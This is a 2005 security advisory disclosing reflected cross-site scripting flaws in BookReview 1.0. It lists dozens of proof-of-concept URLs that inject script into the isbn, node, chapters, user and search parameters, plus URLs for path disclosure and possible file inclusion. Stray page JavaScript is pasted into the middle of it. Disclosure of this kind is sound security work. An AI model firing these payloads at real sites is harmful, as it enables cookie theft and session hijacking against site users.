################################################### BookReview 1.0 multiple variable XSS vendor url: http://www.readersunite.com advisory: http://lostmon.blogspot.com/2005/05/bookreview-10-multiple-variable-xss.html vendor notify: yes exploit available: yes ################################################### BookReview contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate multiple variables upon submission to multiple scripts. This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity. ############ versions: ############ BookReview beta 1.0 vulnerable. ############## solution ############## no solution was available at this time (the fix on the vendor side is to HTML-encode the reflected parameters — isbn, node, chapters, page, user and submit[string] — before echoing them into the response). ########### timeline ########### discovered: 27 april 2005 vendor notify: 17 may 2005 (webform) disclosure: 26 may 2005 ################## proof of concepts ################### all files are submitted to the 'index.php' script by the variable 'page', like index.php?page=[NAME_OF_MODULE]&isbn=[NUMBER_OF_ISBN] — the name of the module can be 'add_review', 'add_contents' or others. For example this url: http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25 is the same as this: http://[victim]/add_contents&isbn=083081423X&chapters=25 With this, you can see we have two ways of exploiting this situation: one through index.php and the other directly via the module. 
################## add_review.htm ################# http://[victim]/add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true http://[victim]/add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Political_Science&review=true http://[victim]/add_review.htm?isbn=0553278223&node=">&review=true http://[victim]/add_review.htm?node=index&isbn=\\"> ################### index.php ################### http://[victim]/index.php?page=add_contents&isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25 http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E NICE ERROR !! ; function tallyup() { var count = 0; var book = 0; var part = 0; var section = 0; var chapter = 0; var appendix = 0; var main_prefix = ""; var section_prefix = ""; for ( i=0; i var persian = '' + value; var roman=""; var ronumdashes=""; var buffer=10-persian.length; while (buffer>0) {persian="0"+persian;buffer--} var units=new Array("","I","II","III","IV","V","VI","VII","VIII","IX"); var tens=new Array("","X","XX","XXX","XL","L","LX","LXX","LXXX","XC"); var hundreds=new Array("","C","CC","CCC","CD","D","DC","DCC","DCCC","CM"); var thousands=new Array("","M","MM","MMM","MV","V","VM","VMM","VMMM","MX"); var billionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes=billionsdashes[persian.substring(0,1)]; var hundredmillionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes+=hundredmillionsdashes[persian.substring(1,2)]; var tenmillionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes+=tenmillionsdashes[persian.substring(2,3)]; var millionsdashes=new Array("","_","__","___","_=","=","=_","=__","=___","_="); romandashes+=millionsdashes[persian.substring(3,4)]; var hundredthousandsdashes=new Array("","_","__","___","__","_","__","___","____","__"); 
romandashes+=hundredthousandsdashes[persian.substring(4,5)]; var tenthousandsdashes=new Array("","_","__","___","__","_","__","___","____","__"); romandashes+=tenthousandsdashes[persian.substring(5,6)]; var thousandsdashes=new Array("","","",""," _","_","_","_","_"," _"); romandashes+=thousandsdashes[persian.substring(6,7)]; roman=thousands[persian.substring(0,1)]; roman+=hundreds[persian.substring(1,2)]; roman+=tens[persian.substring(2,3)]; roman+=thousands[persian.substring(3,4)]; roman+=hundreds[persian.substring(4,5)]; roman+=tens[persian.substring(5,6)]; roman+=thousands[persian.substring(6,7)]; roman+=hundreds[persian.substring(7,8)]; roman+=tens[persian.substring(8,9)]; roman+=units[persian.substring(9,10)]; return roman; } function alphabetise(number) { return String.fromCharCode(64+number); } /// function submitconfirm() { var agree = document.getElementById('agree'); if ( !agree.checked ) { alert("You must indicate your agreement to the terms and conditions by checking the box provided."); return false; } return true; } ################### add_contents.htm ################### http://[victim]/add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[victim]/suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[victim]/contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[victim]/add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E ######################### others. 
######################### http://[victim]/add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author http://[victim]/add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels http://[victim]/suggest_review.htm?node=Business_and_Economics"> ############################ possible local file inclusion ############################ http://[victim]/suggestions/">.htm http://[victim]/directory/">%3Cscript%3Ealert(document.cookie)%3C/script%3E.htm http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author ################ path disclosure: ################ http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit=Ok&submit%5Btype%5D=author http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit%5Btype%5D=title ######################## €nd ######################## thnx to estrella for being my light Thnx to icaro he is my Shadow !!! thnx to all http://www.osvdb.org Team thnx to all who day after day support me !!! -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Data Mangler of: http://www.osvdb.org -- La curiosidad es lo que hace mover la mente